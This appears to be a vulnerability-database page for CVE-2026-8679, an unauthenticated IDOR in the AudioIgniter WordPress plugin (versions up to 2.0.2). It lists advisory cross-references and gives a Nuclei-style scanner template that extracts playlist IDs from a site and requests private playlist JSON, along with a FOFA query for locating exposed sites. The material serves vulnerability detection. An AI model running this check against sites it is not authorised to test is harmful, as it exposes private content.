| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2026-8679 | 22 May 202607:50 | – | attackerkb | |
| CVE-2026-8679 | 22 May 202601:55 | – | circl | |
| WordPress plugin AudioIgniter 安全漏洞 | 22 May 202600:00 | – | cnnvd | |
| CVE-2026-8679 | 22 May 202607:50 | – | cve | |
| CVE-2026-8679 AudioIgniter Music Player <= 2.0.2 - Unauthenticated Insecure Direct Object Reference to 'audioigniter_playlist_id' Parameter | 22 May 202607:50 | – | cvelist | |
| EUVD-2026-31421 | 22 May 202607:50 | – | euvd | |
| CVE-2026-8679 | 22 May 202609:16 | – | nvd | |
| WordPress AudioIgniter Music Player plugin <= 2.0.2 - Unauthenticated Insecure Direct Object Reference to 'audioigniter_playlist_id' Parameter vulnerability | 22 May 202607:03 | – | patchstack | |
| PT-2026-42737 | 22 May 202600:00 | – | ptsecurity | |
| CVE-2026-8679 | 5 Jun 202619:10 | – | redhatcve |
id: CVE-2026-8679
info:
name: WordPress AudioIgniter <= 2.0.2 - Unauthenticated IDOR
author: 0x_Akoko
severity: high
description: |
The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. The handle_playlist_endpoint() function accepted a user-controlled playlist ID and returned track data without authentication.
impact: |
Unauthenticated attackers can access sensitive playlist metadata including private and draft content, leading to information disclosure.
remediation: |
Update to the latest version of AudioIgniter plugin.
reference:
- https://plugins.trac.wordpress.org/browser/audioigniter/trunk/audioigniter.php
- https://nvd.nist.gov/vuln/detail/CVE-2026-8679
- https://wordpress.org/plugins/audioigniter/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-8679
epss-score: 0.01508
epss-percentile: 0.71318
cwe-id: CWE-639
metadata:
verified: true
max-request: 2
fofa-query: body="audioigniter_playlist_id"
tags: cve,cve2026,wordpress,wp-plugin,audioigniter,idor,exposure,wp
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "audioigniter_playlist_id")'
condition: and
internal: true
extractors:
- type: regex
name: playlist_id
part: body
regex:
- 'audioigniter_playlist_id=(\d+)'
group: 1
internal: true
- raw:
- |
GET /?audioigniter_playlist_id={{playlist_id}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "\"title\"", "\"audio\"", "\"subtitle\"")'
condition: and
# digest: 4a0a0047304502206879e822cf5a7319ab0a14722fc4a567350c7ca56261f204ff24cbadede43d34022100a2f4f705ffdf01ac9c04f6b46fda3545bc62d510d49c14ac6bdac7db802ab097:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation